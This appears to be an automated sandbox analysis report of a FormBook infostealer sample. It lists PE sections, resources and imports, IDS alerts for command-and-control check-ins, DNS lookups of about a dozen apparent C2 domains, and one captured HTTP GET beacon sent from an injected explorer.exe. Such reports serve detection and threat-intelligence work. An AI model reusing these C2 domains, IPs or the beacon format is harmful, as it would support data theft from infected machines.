                                            .reloc0x1060000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_ICON0xc85a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                            RT_ICON0xc86d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                            RT_ICON0xc87f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                            RT_ICON0xc89200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                            RT_ICON0xc8c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                            RT_ICON0xc8d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                            RT_ICON0xc9bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                            RT_ICON0xca4800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                            RT_ICON0xca9e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                            RT_ICON0xccf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                            RT_ICON0xce0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                            RT_MENU0xce4a00x50dataEnglishGreat Britain0.9
                                            RT_STRING0xce4f00x594dataEnglishGreat Britain0.3333333333333333
                                            RT_STRING0xcea840x68adataEnglishGreat Britain0.2747909199522103
                                            RT_STRING0xcf1100x490dataEnglishGreat Britain0.3715753424657534
                                            RT_STRING0xcf5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                            RT_STRING0xcfb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                            RT_STRING0xd01f80x466dataEnglishGreat Britain0.3605683836589698
                                            RT_STRING0xd06600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                            RT_RCDATA0xd07b80x34e22data1.0003508609944138
                                            RT_GROUP_ICON0x1055dc0x76dataEnglishGreat Britain0.6610169491525424
                                            RT_GROUP_ICON0x1056540x14dataEnglishGreat Britain1.25
                                            RT_GROUP_ICON0x1056680x14dataEnglishGreat Britain1.15
                                            RT_GROUP_ICON0x10567c0x14dataEnglishGreat Britain1.25
                                            RT_VERSION0x1056900xdcdataEnglishGreat Britain0.6181818181818182
                                            RT_MANIFEST0x10576c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                            Imports

                                            DLLImport
                                            WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                            VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                            WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                            COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                            MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                            WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                            PSAPI.DLLGetProcessMemoryInfo
                                            IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                            USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                            UxTheme.dllIsThemeActive
                                            KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                            USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                            GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                            COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                            ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                            OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                            Possible Origin

                                            Language of compilation systemCountry where language is spokenMap
                                            EnglishGreat Britain

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            07/03/24-17:27:15.447591TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971580192.168.2.9185.53.179.91
                                            07/03/24-17:28:17.173810TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971780192.168.2.9104.194.9.178
                                            07/03/24-17:26:54.930423TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971480192.168.2.93.64.163.50
                                            07/03/24-17:29:39.440629TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972080192.168.2.9188.114.96.3
                                            07/03/24-17:26:15.356501TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971180192.168.2.976.223.105.230
                                            07/03/24-17:28:37.873542TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971880192.168.2.989.106.200.1
                                            07/03/24-17:25:55.097431TCP2031412ET TROJAN FormBook CnC Checkin (GET)4970980192.168.2.9188.114.97.3
                                            07/03/24-17:27:36.550599TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971680192.168.2.9194.41.37.158
                                            07/03/24-17:29:18.833017TCP2031412ET TROJAN FormBook CnC Checkin (GET)4971980192.168.2.965.21.196.90

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 3, 2024 17:25:55.092230082 CEST4970980192.168.2.9188.114.97.3
                                            Jul 3, 2024 17:25:55.097301960 CEST8049709188.114.97.3192.168.2.9
                                            Jul 3, 2024 17:25:55.097368956 CEST4970980192.168.2.9188.114.97.3
                                            Jul 3, 2024 17:25:55.097430944 CEST4970980192.168.2.9188.114.97.3
                                            Jul 3, 2024 17:25:55.102586031 CEST8049709188.114.97.3192.168.2.9
                                            Jul 3, 2024 17:25:55.568639040 CEST8049709188.114.97.3192.168.2.9
                                            Jul 3, 2024 17:25:55.569356918 CEST8049709188.114.97.3192.168.2.9
                                            Jul 3, 2024 17:25:55.569442987 CEST4970980192.168.2.9188.114.97.3
                                            Jul 3, 2024 17:25:55.569813013 CEST4970980192.168.2.9188.114.97.3
                                            Jul 3, 2024 17:25:55.574826956 CEST8049709188.114.97.3192.168.2.9
                                            Jul 3, 2024 17:26:15.349034071 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.353988886 CEST804971176.223.105.230192.168.2.9
                                            Jul 3, 2024 17:26:15.356364965 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.356501102 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.362159967 CEST804971176.223.105.230192.168.2.9
                                            Jul 3, 2024 17:26:15.855173111 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.855463028 CEST804971176.223.105.230192.168.2.9
                                            Jul 3, 2024 17:26:15.855570078 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.855854034 CEST804971176.223.105.230192.168.2.9
                                            Jul 3, 2024 17:26:15.855906963 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:15.860112906 CEST804971176.223.105.230192.168.2.9
                                            Jul 3, 2024 17:26:15.860171080 CEST4971180192.168.2.976.223.105.230
                                            Jul 3, 2024 17:26:54.925086021 CEST4971480192.168.2.93.64.163.50
                                            Jul 3, 2024 17:26:54.930198908 CEST80497143.64.163.50192.168.2.9
                                            Jul 3, 2024 17:26:54.930263996 CEST4971480192.168.2.93.64.163.50
                                            Jul 3, 2024 17:26:54.930423021 CEST4971480192.168.2.93.64.163.50
                                            Jul 3, 2024 17:26:54.935208082 CEST80497143.64.163.50192.168.2.9
                                            Jul 3, 2024 17:26:55.433221102 CEST4971480192.168.2.93.64.163.50
                                            Jul 3, 2024 17:26:55.438306093 CEST80497143.64.163.50192.168.2.9
                                            Jul 3, 2024 17:26:55.438368082 CEST4971480192.168.2.93.64.163.50
                                            Jul 3, 2024 17:27:15.442362070 CEST4971580192.168.2.9185.53.179.91
                                            Jul 3, 2024 17:27:15.447262049 CEST8049715185.53.179.91192.168.2.9
                                            Jul 3, 2024 17:27:15.447384119 CEST4971580192.168.2.9185.53.179.91
                                            Jul 3, 2024 17:27:15.447591066 CEST4971580192.168.2.9185.53.179.91
                                            Jul 3, 2024 17:27:15.452756882 CEST8049715185.53.179.91192.168.2.9
                                            Jul 3, 2024 17:27:15.936372042 CEST4971580192.168.2.9185.53.179.91
                                            Jul 3, 2024 17:27:15.941962004 CEST8049715185.53.179.91192.168.2.9
                                            Jul 3, 2024 17:27:15.944490910 CEST4971580192.168.2.9185.53.179.91
                                            Jul 3, 2024 17:27:36.544799089 CEST4971680192.168.2.9194.41.37.158
                                            Jul 3, 2024 17:27:36.550411940 CEST8049716194.41.37.158192.168.2.9
                                            Jul 3, 2024 17:27:36.550496101 CEST4971680192.168.2.9194.41.37.158
                                            Jul 3, 2024 17:27:36.550599098 CEST4971680192.168.2.9194.41.37.158
                                            Jul 3, 2024 17:27:36.556301117 CEST8049716194.41.37.158192.168.2.9
                                            Jul 3, 2024 17:27:37.058290958 CEST4971680192.168.2.9194.41.37.158
                                            Jul 3, 2024 17:27:37.108129978 CEST8049716194.41.37.158192.168.2.9
                                            Jul 3, 2024 17:27:37.122683048 CEST8049716194.41.37.158192.168.2.9
                                            Jul 3, 2024 17:27:37.122749090 CEST4971680192.168.2.9194.41.37.158

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jul 3, 2024 17:25:55.074827909 CEST5109253192.168.2.91.1.1.1
                                            Jul 3, 2024 17:25:55.091548920 CEST53510921.1.1.1192.168.2.9
                                            Jul 3, 2024 17:26:15.308891058 CEST5908353192.168.2.91.1.1.1
                                            Jul 3, 2024 17:26:15.346124887 CEST53590831.1.1.1192.168.2.9
                                            Jul 3, 2024 17:26:34.263456106 CEST5579853192.168.2.91.1.1.1
                                            Jul 3, 2024 17:26:34.330478907 CEST53557981.1.1.1192.168.2.9
                                            Jul 3, 2024 17:26:54.903444052 CEST5513553192.168.2.91.1.1.1
                                            Jul 3, 2024 17:26:54.924207926 CEST53551351.1.1.1192.168.2.9
                                            Jul 3, 2024 17:27:15.371752024 CEST6551153192.168.2.91.1.1.1
                                            Jul 3, 2024 17:27:15.432128906 CEST53655111.1.1.1192.168.2.9
                                            Jul 3, 2024 17:27:35.903141022 CEST6254253192.168.2.91.1.1.1
                                            Jul 3, 2024 17:27:36.543915033 CEST53625421.1.1.1192.168.2.9
                                            Jul 3, 2024 17:27:56.387062073 CEST5016653192.168.2.91.1.1.1
                                            Jul 3, 2024 17:27:56.966373920 CEST53501661.1.1.1192.168.2.9
                                            Jul 3, 2024 17:28:16.871649027 CEST6385153192.168.2.91.1.1.1
                                            Jul 3, 2024 17:28:17.167802095 CEST53638511.1.1.1192.168.2.9
                                            Jul 3, 2024 17:28:37.358844042 CEST6375153192.168.2.91.1.1.1
                                            Jul 3, 2024 17:28:37.865365982 CEST53637511.1.1.1192.168.2.9
                                            Jul 3, 2024 17:28:58.088654041 CEST5115353192.168.2.91.1.1.1
                                            Jul 3, 2024 17:28:58.223104954 CEST53511531.1.1.1192.168.2.9
                                            Jul 3, 2024 17:29:18.740637064 CEST6357053192.168.2.91.1.1.1
                                            Jul 3, 2024 17:29:18.820117950 CEST53635701.1.1.1192.168.2.9
                                            Jul 3, 2024 17:29:39.387249947 CEST6007653192.168.2.91.1.1.1
                                            Jul 3, 2024 17:29:39.434956074 CEST53600761.1.1.1192.168.2.9

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Jul 3, 2024 17:25:55.074827909 CEST192.168.2.91.1.1.10xcb91Standard query (0)www.checkout4xgrow.shopA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:15.308891058 CEST192.168.2.91.1.1.10x2fc6Standard query (0)www.kgstrengthandperformance.comA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:34.263456106 CEST192.168.2.91.1.1.10x638eStandard query (0)www.bvlazaedi.xyzA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:54.903444052 CEST192.168.2.91.1.1.10x7ec8Standard query (0)www.babyscan.xyzA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:15.371752024 CEST192.168.2.91.1.1.10xbf0fStandard query (0)www.gb-electric-wheelchairs-8j.bondA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:35.903141022 CEST192.168.2.91.1.1.10x1b0bStandard query (0)www.76466.clubA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:56.387062073 CEST192.168.2.91.1.1.10xbc0eStandard query (0)www.ujgddhhfeffsfgg2.groupA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:16.871649027 CEST192.168.2.91.1.1.10xaf16Standard query (0)www.modleavedepts.onlineA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:37.358844042 CEST192.168.2.91.1.1.10xa961Standard query (0)www.momura.xyzA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:58.088654041 CEST192.168.2.91.1.1.10xe085Standard query (0)www.gas39.proA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:29:18.740637064 CEST192.168.2.91.1.1.10xb50aStandard query (0)www.00050516.xyzA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:29:39.387249947 CEST192.168.2.91.1.1.10xfb44Standard query (0)www.topallinoneaccounting.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Jul 3, 2024 17:25:55.091548920 CEST1.1.1.1192.168.2.90xcb91No error (0)www.checkout4xgrow.shop188.114.97.3A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:25:55.091548920 CEST1.1.1.1192.168.2.90xcb91No error (0)www.checkout4xgrow.shop188.114.96.3A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:15.346124887 CEST1.1.1.1192.168.2.90x2fc6No error (0)www.kgstrengthandperformance.comkgstrengthandperformance.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:26:15.346124887 CEST1.1.1.1192.168.2.90x2fc6No error (0)kgstrengthandperformance.com76.223.105.230A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:15.346124887 CEST1.1.1.1192.168.2.90x2fc6No error (0)kgstrengthandperformance.com13.248.243.5A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:34.330478907 CEST1.1.1.1192.168.2.90x638eServer failure (2)www.bvlazaedi.xyznonenoneA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:26:54.924207926 CEST1.1.1.1192.168.2.90x7ec8No error (0)www.babyscan.xyz3.64.163.50A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:15.432128906 CEST1.1.1.1192.168.2.90xbf0fNo error (0)www.gb-electric-wheelchairs-8j.bond185.53.179.91A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)www.76466.clubuaslkd.skasdhu.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)uaslkd.skasdhu.huhusddfnsuegcdn.comgt.huhusddfnsuegcdn.comCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.158A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.181A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.193A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.192A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.156A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:36.543915033 CEST1.1.1.1192.168.2.90x1b0bNo error (0)gt.huhusddfnsuegcdn.com194.41.37.190A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:27:56.966373920 CEST1.1.1.1192.168.2.90xbc0eName error (3)www.ujgddhhfeffsfgg2.groupnonenoneA (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:17.167802095 CEST1.1.1.1192.168.2.90xaf16No error (0)www.modleavedepts.onlinemodleavedepts.onlineCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:28:17.167802095 CEST1.1.1.1192.168.2.90xaf16No error (0)modleavedepts.online104.194.9.178A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:37.865365982 CEST1.1.1.1192.168.2.90xa961No error (0)www.momura.xyzedge.redirect.pizzaCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:28:37.865365982 CEST1.1.1.1192.168.2.90xa961No error (0)edge.redirect.pizza89.106.200.1A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:28:58.223104954 CEST1.1.1.1192.168.2.90xe085No error (0)www.gas39.progas39.proCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:29:18.820117950 CEST1.1.1.1192.168.2.90xb50aNo error (0)www.00050516.xyz00050516.xyzCNAME (Canonical name)IN (0x0001)false
                                            Jul 3, 2024 17:29:18.820117950 CEST1.1.1.1192.168.2.90xb50aNo error (0)00050516.xyz65.21.196.90A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:29:39.434956074 CEST1.1.1.1192.168.2.90xfb44No error (0)www.topallinoneaccounting.com188.114.96.3A (IP address)IN (0x0001)false
                                            Jul 3, 2024 17:29:39.434956074 CEST1.1.1.1192.168.2.90xfb44No error (0)www.topallinoneaccounting.com188.114.97.3A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.checkout4xgrow.shop
                                            • www.kgstrengthandperformance.com
                                            • www.babyscan.xyz
                                            • www.gb-electric-wheelchairs-8j.bond
                                            • www.76466.club

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.949709188.114.97.3803504C:\Windows\explorer.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 3, 2024 17:25:55.097430944 CEST173OUTGET /ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX HTTP/1.1
                                            Host: www.checkout4xgrow.shop
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jul 3, 2024 17:25:55.568639040 CEST931INHTTP/1.1 301 Moved Permanently
                                            Date: Wed, 03 Jul 2024 15:25:55 GMT
                                            Content-Type: text/html
                                            Content-Length: 167
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 03 Jul 2024 16:25:55 GMT
                                            Location: https://www.checkout4xgrow.shop/ts59/?S0GhCH=DR-Lh8FH5BP&Upql=F3s9qclS9ajlyltz5vx8YuFcODa05tGO2XwI753moUwU8ctXmF/lD/LedP+MQBQFZjkX
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s46z74UkM0VhpB4bctNiU9Fzz2YE%2BPIbW54INbvTf4FMqS4hqrXR5QHDHHLlB8IkOq72Cp2vJZLS%2FxVz41ymJW33kZcqbqVwvu6k4r295qV7Hbo5FZRPFRUnFK3ZyliSeHb9uZsmYJt5jg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 89d7e415ed177c87-EWR
                                            alt-svc: h3=":443"; ma=86400
